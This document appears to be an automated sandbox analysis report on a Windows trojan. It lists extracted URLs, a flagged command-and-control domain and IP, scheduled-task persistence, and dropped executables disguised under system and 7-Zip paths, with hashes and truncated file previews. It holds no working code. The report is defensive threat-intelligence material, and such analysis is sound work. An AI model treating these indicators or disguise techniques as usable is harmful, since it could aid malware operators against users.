https://play.google.com/store/apps/details?id=com.timeweb.hosting	Memory Compression.exe, 00000024.00000002.2240602993.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126A1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002794000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://hosting.timeweb.ru/	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/services/bitrix/	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://telegram.me/timeweb_bot	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://cy08450.tw1.ru	Memory Compression.exe, 00000024.00000002.2240602993.0000000002731000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000275E000.00000004.00000800.00020000.00000000.sdmp	true		unknown
https://timeweb.com/ru/about/jobs/2224/	Memory Compression.exe, 00000024.00000002.2240602993.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126A1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002794000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.youtube.com/channel/UCTSnrzx_YKQOzTR1Y6OxxSQ	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/support/documents/	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126A1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://twitter.com/Timeweb	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/services/hosting/	Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/services/constructor/	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://timeweb.com/ru/services/bonuses/2928/	Memory Compression.exe, 00000024.00000002.2242956294.0000000012752000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2242956294.00000000126C1000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.000000000283D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002798000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://cy08450.tw1.ru/	Memory Compression.exe, 00000024.00000002.2240602993.0000000002725000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002631000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.0000000002731000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000024.00000002.2240602993.00000000027B9000.00000004.00000800.00020000.00000000.sdmp	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.114.245.123	vh438.timeweb.ru	Russian Federation		9123	TIMEWEB-ASRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1545622
Start date and time:	2024-10-30 18:26:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	CPYEzG7VGh.exe renamed because original name is a hash value
Original Sample Name:	F7361ED3503F11A56E8CC53AD6C277B8.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@46/26@4/1
EGA Information:	Successful, ratio: 11.1%
HCA Information:	Successful, ratio: 91% Number of executed functions: 474 Number of non-executed functions: 104
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Agentserver.exe, PID 3356 because it is empty
Execution Graph export aborted for target Memory Compression.exe, PID 1200 because it is empty
Execution Graph export aborted for target Memory Compression.exe, PID 5968 because it is empty
Execution Graph export aborted for target dasHost.exe, PID 3228 because it is empty
Execution Graph export aborted for target dasHost.exe, PID 5740 because it is empty
Execution Graph export aborted for target dasHost.exe, PID 6448 because it is empty
Execution Graph export aborted for target uXGucUKOPdf.exe, PID 6388 because it is empty
Execution Graph export aborted for target uXGucUKOPdf.exe, PID 6524 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: CPYEzG7VGh.exe

Simulations

Behavior and APIs

Time	Type	Description
13:27:10	API Interceptor	41x Sleep call for process: Memory Compression.exe modified
18:27:02	Task Scheduler	Run new task: dasHost path: "C:\surrogateserverreviewsession\dasHost.exe"
18:27:03	Task Scheduler	Run new task: dasHostd path: "C:\surrogateserverreviewsession\dasHost.exe"
18:27:03	Task Scheduler	Run new task: Memory Compression path: "C:\Program Files\7-Zip\Lang\Memory Compression.exe"
18:27:03	Task Scheduler	Run new task: Memory CompressionM path: "C:\Program Files\7-Zip\Lang\Memory Compression.exe"
18:27:03	Task Scheduler	Run new task: uXGucUKOPdf path: "C:\Program Files\Windows NT\uXGucUKOPdf.exe"
18:27:03	Task Scheduler	Run new task: uXGucUKOPdfu path: "C:\Program Files\Windows NT\uXGucUKOPdf.exe"

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TIMEWEB-ASRU	DividasAtivas_tgj.vbs	Get hash	malicious	Unknown	Browse	92.53.116.138
	QYP0tD7z0c.exe	Get hash	malicious	DCRat	Browse	92.53.106.114
	EBalcao_ysx.vbs	Get hash	malicious	Unknown	Browse	92.53.116.138
	kQyd2z80gD.exe	Get hash	malicious	DCRat	Browse	92.53.106.114
	phc.exe	Get hash	malicious	Unknown	Browse	92.53.116.138
	Simple.exe	Get hash	malicious	Unknown	Browse	92.53.116.138
	Stacks.exe	Get hash	malicious	Unknown	Browse	92.53.116.138
	Tcbnyqc7Cr.exe	Get hash	malicious	DCRat	Browse	185.114.247.170
	YxRMWWHAA2.exe	Get hash	malicious	DCRat	Browse	185.114.247.170
	Layer.exe	Get hash	malicious	Unknown	Browse	92.53.116.138

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://jpm-ghana-2024-election-conversation-with-oct-24.open-exchange.net/join-the-call?ml_access_token=eyJjb250ZW50Ijp7ImV4cGlyYXRpb25EYXRlIjoiMjAyNC0xMC0zMVQxNToyMDo1OS4wMDZaIiwiZW1haWwiOiJyZGVpdHpAdnItY2FwaXRhbC5jb20iLCJldmVudElkIjo0MjY3Mn0sInNpZ25hdHVyZSI6Ik1FVUNJQzhaMDJJblVZd0syUk9WRkdjL1pMNHRBbWo4RmwxdW9mQjhwZzRmSjZsMkFpRUE5d25HUFFoa3ZrdkM2MlJkQ3lkM09YbnFJZ0xlQTAwMDIxNlRWbG9Hb0ZjPSJ9	Get hash	malicious	Unknown	Browse	185.114.245.123
	SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe	Get hash	malicious	AgentTesla	Browse	185.114.245.123
	http://ffcu.online	Get hash	malicious	Unknown	Browse	185.114.245.123
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.114.245.123
	https://token.onelogin.com-token-auth.com/Xa0Y1MmVibVhmY0E5dnlabzhVK2w2MVo4bXZUM3RzTFBZU1FSUEYxRHlzb29tODRTUDQ4alBDR3Y1cWUvN1JvVzhtWGVkaHFaSG0rOVpUTVV1VjY2a3MvZDB6TktwTHhsRk9xdzQwQjV6YjIvcnA5MjFsaFJEamtNdXI5UXQ1Qm9lK0ZsZFd0TXI0R2JWWlVYeFFXa2pBaXZOKzR2QXRkUTd3dlBLNzUrQ1RweERVMmQ5ZHQwdjlKZ2dlS2tEVUF5UEE9PS0tdFFWWndQdklZQXNodTY1US0tUXAyU1llVHhDaXRTRjU1OVNWMXFNdz09?cid=2262276963	Get hash	malicious	KnowBe4	Browse	185.114.245.123
	Review_&_Aprove_Your_Next_Payroll84633.html	Get hash	malicious	Unknown	Browse	185.114.245.123
	0T32Kz4dZU.exe	Get hash	malicious	Stealc, Vidar	Browse	185.114.245.123
	Factura Honorarios 2024-10.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	185.114.245.123
	Fernissagerne.exe	Get hash	malicious	Snake Keylogger	Browse	185.114.245.123
	JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	185.114.245.123

Dropped Files

⊘No context

Created / dropped Files

C:\Program Files (x86)\Microsoft.NET\RedistList\d5489f5e5451db

Download File

Process:	C:\surrogateserverreviewsession\Agentserver.exe
File Type:	ASCII text, with very long lines (331), with no line terminators
Category:	dropped
Size (bytes):	331
Entropy (8bit):	5.7986644584027776
Encrypted:	false
SSDEEP:	6:oe+nd+vf3q+AK9CH2i6aM8we6TLRDU2gwy0cRqHevOxrcgr87Myqxn:oY38K62itgPG2zoRq+GRcgbyqx
MD5:	B3083BA16D0EAB90389C90E9688EA708
SHA1:	F9ED55E2502B974FBA06D11993E129CCF620C27F
SHA-256:	56C49DE6BFC48450231AE1E97D1CA697957B6CA60F45C7FF496A46BD62577A23
SHA-512:	0C5911AD155071165162AD05EA48F7A2E6EEF11259529F94B9F64B0506D55362955EE6259D0BA33A8BACFD7B531482D81256163C19611D6268975C20C03B29E3
Malicious:	false
Preview:	z3rHw1H3caqXfO5ENGun3l0fmihfLTNss7m7boJQsOJJfVsMbKLU5BaODMeOTlsIN8phl8nj6d4pcq9QzVEBI3wqhY3PJ57GfA6hpKkchmXcHvvWMOY7hqATL9ANFXaBgyJbubkpvldgfUjvmhC5g9iz9mWqKXXJLW6SlTmvntM5Ney1aOkhVeegPUbHF3eYOUUJXQJS4RRxxmlfyeQ5wzyq1aDR1fptOyr3KodJESmDNqsms6SknjlYfnR7N2aZlij85sUJBH1eMudLraj5MEGpMTXhXf6M1NcoHtr9lIjgsHLuJGQwTfNgc4wmVxwgKom9SzD7tjT

C:\Program Files (x86)\Microsoft.NET\RedistList\uXGucUKOPdf.exe

Download File

Process:	C:\surrogateserverreviewsession\Agentserver.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	848896
Entropy (8bit):	6.081444529255217
Encrypted:	false
SSDEEP:	12288:1hxgIFhrjlpTamA1MV81MHwoST2ATWfEJ+0eh7i8+BSK6d7k0J:13rXTamAQ8uwoqTWy1Y7i887Kt
MD5:	F1AAAC4C20DF683E3596C8A7CD3DA07E
SHA1:	928E098DEA596D12E22ED56F85CF028BCF27B31F
SHA-256:	F3DD651E1EE7AB505F52E2C269A70E661D06E0EB51285AB41F89B3736352FA89
SHA-512:	613387CC5D808DD7A9199212476A2FF34A92F5919D1EA353B204AA931248B2FBF0EFE9261BFCA6DDB804621A8D6234DF4558CFFC326050A9424957DE3B05C6E2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......n.... ........@.. .......................`............@................................. ...K.... .......................@....................................................... ............... ..H............text...t.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Lang\1a5d5b8dcee3d8

Download File

Process:	C:\surrogateserverreviewsession\Agentserver.exe
File Type:	ASCII text, with very long lines (342), with no line terminators
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.8054479658866125
Encrypted:	false
SSDEEP:	6:EFzNW7fIXo9W6ONPDab5gQ2ztiqGcqpiHQAX6IvgUpSkYIDNsdLAOb14xy:0NmwYN065VQircqpiHBXFpq+8Bp4xy
MD5:	5FA29BB70C3E63117418EECBC7078934
SHA1:	AEC3B69F53ADBA97AED6297B765EB92F5C57667C
SHA-256:	121D08E0816FCF90D9958DA857644ED0D6B269CEED31D906E62BC59A2F0DDCF3
SHA-512:	C090E354C8428633AA2A109A58D1651170E518EB97510D557B48151A7F173CC8F1C8F860EB4F751EC66E2D6B6E2A2E0B801BB91BB8402D2520F6E7FA68D3541C
Malicious:	false
Preview:	Tiz9bGbMz5i01JUFMAJ6wCskIs2XlExsOP7ZL1H2sUMKLGjU8CiBtwiRzO1sNEkuI0llL43V3RNczhZBIiZjfw8crpk7AYootcCUe7IDJNHbiGcRyzkppBOV1J4fU5VfmjsWfEgKZVaSog3kNSJKy99rNqdVCntN2mz9XFwtSZPTl6rUPURBwKrnjBJylLIwlMaCr4NIgZ2YtpGR9IFsVrar5LZW67IGRdsYgpnVGJfXSS3441zdGZb4wsGff1MiQvHQ7rvUfumLMDZmSebEIpA2CymxiHzP77GgLm7NFf8WwPrsSeNAZHZluPOJF7vY4WOP62bphO9nroFwG3fE3z

C:\Program Files\7-Zip\Lang\Memory Compression.exe

Download File

Process:	C:\surrogateserverreviewsession\Agentserver.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	848896
Entropy (8bit):	6.081444529255217
Encrypted:	false
SSDEEP:	12288:1hxgIFhrjlpTamA1MV81MHwoST2ATWfEJ+0eh7i8+BSK6d7k0J:13rXTamAQ8uwoqTWy1Y7i887Kt
MD5:	F1AAAC4C20DF683E3596C8A7CD3DA07E
SHA1:	928E098DEA596D12E22ED56F85CF028BCF27B31F
SHA-256:	F3DD651E1EE7AB505F52E2C269A70E661D06E0EB51285AB41F89B3736352FA89
SHA-512:	613387CC5D808DD7A9199212476A2FF34A92F5919D1EA353B204AA931248B2FBF0EFE9261BFCA6DDB804621A8D6234DF4558CFFC326050A9424957DE3B05C6E2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......n.... ........@.. .......................`............@................................. ...K.... .......................@....................................................... ............... ..H............text...t.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Windows NT\d5489f5e5451db

Download File

Process:	C:\surrogateserverreviewsession\Agentserver.exe
File Type:	ASCII text, with very long lines (582), with no line terminators
Category:	dropped
Size (bytes):	582
Entropy (8bit):	5.8616472242085695
Encrypted:	false
SSDEEP:	12:kQRWOBTMqTVEnTgJdGURuwt2JyCfbbGLSIzWJhRWCcic5hfd:9tBTzEn8JdJRZgfbuSIzkhRWCz41
MD5:	98589383A9FD10D3BF42229D23F27DD8
SHA1:	01AB50C861244E6A97D5C0B12726CA2B0FB893BE
SHA-256:	F3757A6D2FB921D3BCD9B5C9F5737844E6D2FF922499FA6BE32F2056CB836E51
SHA-512:	5FA4F615B6F51AE28679D853C79C029BEC7E1F1E939E0EDF47916D0E53AB2C8B256AF7405E99D6137EE012D705DB799A136A894FE9FEC67F8D61F98A75253385
Malicious:	false
Preview:	baBcvZChcLIv4GJcCLcreFgXrcHfRtG14HMovnHFBVWosvjpv6u6oBFW3nvTSgQtFQ1x3fqZEXpIs1p52ctV8JM2B0vH2ywfEnjb4wvQPV2RV6nB70a0w5u5E8vCtihQkKDFSOAGqdFnR5gFNtKBX6sJ3oX6AsgqymqL2httzUJTzGnIbpzAYf3oc4Mo1EF76ZzpOVNpAbMCwYUwAOeU2gRStCs7VF2vPLXZR84FcKA7S01DkZnmjuFZHg6MmPT4jbwkB4fCUY2sgUA2KpX6bPLeG7SvCrcM1FX1DRCq4lRL2X2xgEC71XcTPSdDmtAm5p0b6Iy3nrB07AmtEeP7pfVemElvx8DKloPMgb0XPIUKVmVPpu8HeC7aUWy2gCFon0PSuaNno1sgKKIAsWGD96qirz2Jn70MDpgeWDePgVcnUaPJOyKK6CprKql5hD9qAfdeonnp10gndCOQjs5yxqPAAzTqbircVvny6vfkLeTGgBNIbUWzIL3UPdeyT6NSIDRrZaTyMUnSWJe8lLPHM2TK2SjdQqQORA7cufsBAimyhk7F9fNIrFGQtGzG00hgDYAVLB

C:\Program Files\Windows NT\uXGucUKOPdf.exe

Download File

Process:	C:\surrogateserverreviewsession\Agentserver.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	848896
Entropy (8bit):	6.081444529255217
Encrypted:	false
SSDEEP:	12288:1hxgIFhrjlpTamA1MV81MHwoST2ATWfEJ+0eh7i8+BSK6d7k0J:13rXTamAQ8uwoqTWy1Y7i887Kt
MD5:	F1AAAC4C20DF683E3596C8A7CD3DA07E
SHA1:	928E098DEA596D12E22ED56F85CF028BCF27B31F
SHA-256:	F3DD651E1EE7AB505F52E2C269A70E661D06E0EB51285AB41F89B3736352FA89
SHA-512:	613387CC5D808DD7A9199212476A2FF34A92F5919D1EA353B204AA931248B2FBF0EFE9261BFCA6DDB804621A8D6234DF4558CFFC326050A9424957DE3B05C6E2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......n.... ........@.. .......................`............@................................. ...K.... .......................@....................................................... ............... ..H............text...t.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Windows Security\BrowserCore\en-US\d5489f5e5451db

Download File

Process:	C:\surrogateserverreviewsession\Agentserver.exe
File Type:	ASCII text, with very long lines (450), with no line terminators
Category:	dropped
Size (bytes):	450
Entropy (8bit):	5.832849827136298
Encrypted:	false
SSDEEP:	12:0U17olbTcUv8DwiISWSYbS4r+w4Mn25vKRs/ihc4gEnUn:x1JDDwXS6V92NKR9cOnU
MD5:	1AB022A023B16207A4AAE77FA8EB4720
SHA1:	2C0A95100714A92C00ACFBFCD1036C53E2F03F50
SHA-256:	6B977E8796F22CA8731CF9E9B417B9F54198EFAD3D262E799DB6BE3FBEA5F294
SHA-512:	235A8C11A77F8342D237AD512EDCFC659CC2AE1048992DF349E2DC6F145EF8C2E117FB3498C66199F93294C157656E2E9858F07615BB40B40C8949F654BF0093
Malicious:	false
Preview:	G2YxU1BujKdXB7BdsvSGKFEzJh52oHEl7sjzJN2r4kyrLpUsBdHFJyRByjox5JFbG2aTXMUe3kMjQWoeMM1L98bIbhAjjEvvfXkSOBUzInLimsub5KktR3bHaR20Lv5yyaD3wVPK1CCWx2gswjoYeCdl5c17JenXrWuLo1pk5Z1P0EUivJDlHgUv6b7UdSBXYppaIUE54DdELOv1HTLAbCQLC8PN4VGmYd0LZ4ZbEIrDCPkrqGMJHA5WYeXKE1Bj70qrXjcN4t5TUNIxYhgxI6fXhew5gPWNGIGMj2UGn8PXFmBLVkwhUNaAUSK3xgrpWsMMH6OgNZKKrIS5ckj5dz23sF1QsaTHQkAWazEZWPU5DPSMAOaM7wMhzSeBF7ywFC4HH5enfKiNe70cxoQdAHJdYdhHVDTZbizAULEEuxqwO8C1cBNarUv82bsoYWRc0J

C:\Program Files\Windows Security\BrowserCore\en-US\uXGucUKOPdf.exe

Download File

Process:	C:\surrogateserverreviewsession\Agentserver.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	848896
Entropy (8bit):	6.081444529255217
Encrypted:	false
SSDEEP:	12288:1hxgIFhrjlpTamA1MV81MHwoST2ATWfEJ+0eh7i8+BSK6d7k0J:13rXTamAQ8uwoqTWy1Y7i887Kt
MD5:	F1AAAC4C20DF683E3596C8A7CD3DA07E
SHA1:	928E098DEA596D12E22ED56F85CF028BCF27B31F
SHA-256:	F3DD651E1EE7AB505F52E2C269A70E661D06E0EB51285AB41F89B3736352FA89
SHA-512:	613387CC5D808DD7A9199212476A2FF34A92F5919D1EA353B204AA931248B2FBF0EFE9261BFCA6DDB804621A8D6234DF4558CFFC326050A9424957DE3B05C6E2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......n.... ........@.. .......................`............@................................. ...K.... .......................@....................................................... ............... ..H............text...t.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\d5489f5e5451db

Download File

Process:	C:\surrogateserverreviewsession\Agentserver.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	163
Entropy (8bit):	5.631074057289833
Encrypted:	false
SSDEEP:	3:ohN1RnRpF/3RQDkk5jQwDU5TfWkAIYyEI/1q3EgPEYY/ce8viGn:ohPRN3Rh6jfGauLq3E1Ue8nn
MD5:	A0538FE99D0BE817AFF960B547F239B1
SHA1:	A8AB8D6FB519962D98552A421CEB0FA7BE839C23
SHA-256:	A21AA10C4AF8D998F52A7BB5A0A7786E6B5C80CD62C214A87E7C37C8C445DCF7
SHA-512:	04DB591445A72B831B83643677CD060D4945DE573E48D3F5860B0E2DAD76AB99345C659DDBE47090184629043580B4DCF59B0C3FF0053DEA6CD4656D882BBB9E
Malicious:	false
Preview:	2W95MN7EoyWDVDfLcTCTDtLJA27resZfRBvQAXn09o5frcO3j5KEO5GJKz4TPQk5Y1vUROLFqLTZxqcinDHiiVQV5mGKcTksEAHzq4mVuEXDlqWdWWqMJBWCkZZoIAmWklUwim1sawye7NuOQmxGnYjCnEORf7MubBc

C:\Recovery\uXGucUKOPdf.exe

Download File

Process:	C:\surrogateserverreviewsession\Agentserver.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	848896
Entropy (8bit):	6.081444529255217
Encrypted:	false
SSDEEP:	12288:1hxgIFhrjlpTamA1MV81MHwoST2ATWfEJ+0eh7i8+BSK6d7k0J:13rXTamAQ8uwoqTWy1Y7i887Kt
MD5:	F1AAAC4C20DF683E3596C8A7CD3DA07E
SHA1:	928E098DEA596D12E22ED56F85CF028BCF27B31F
SHA-256:	F3DD651E1EE7AB505F52E2C269A70E661D06E0EB51285AB41F89B3736352FA89
SHA-512:	613387CC5D808DD7A9199212476A2FF34A92F5919D1EA353B204AA931248B2FBF0EFE9261BFCA6DDB804621A8D6234DF4558CFFC326050A9424957DE3B05C6E2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......n.... ........@.. .......................`............@................................. ...K.... .......................@....................................................... ............... ..H............text...t.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

